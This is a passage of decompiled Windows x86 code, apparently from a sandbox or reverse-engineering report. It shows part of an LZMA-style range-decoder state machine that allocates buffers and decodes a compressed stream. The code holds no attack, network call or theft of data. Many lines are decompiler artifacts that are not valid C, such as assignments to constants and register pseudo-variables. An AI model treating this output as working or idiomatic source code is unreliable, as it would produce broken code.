											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
